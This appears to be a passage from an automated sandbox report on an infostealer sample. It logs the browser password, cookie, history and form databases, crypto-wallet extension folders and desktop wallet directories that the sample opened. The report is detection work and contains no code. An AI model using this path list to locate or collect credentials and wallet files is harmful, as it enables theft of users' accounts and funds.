Source: SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe, 00000000.00000003.1925499424.0000000002B1B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe, 00000000.00000003.1925652179.0000000002B86000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: keystore
Source: SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe, 00000000.00000003.1925499424.0000000002B1B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live"

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
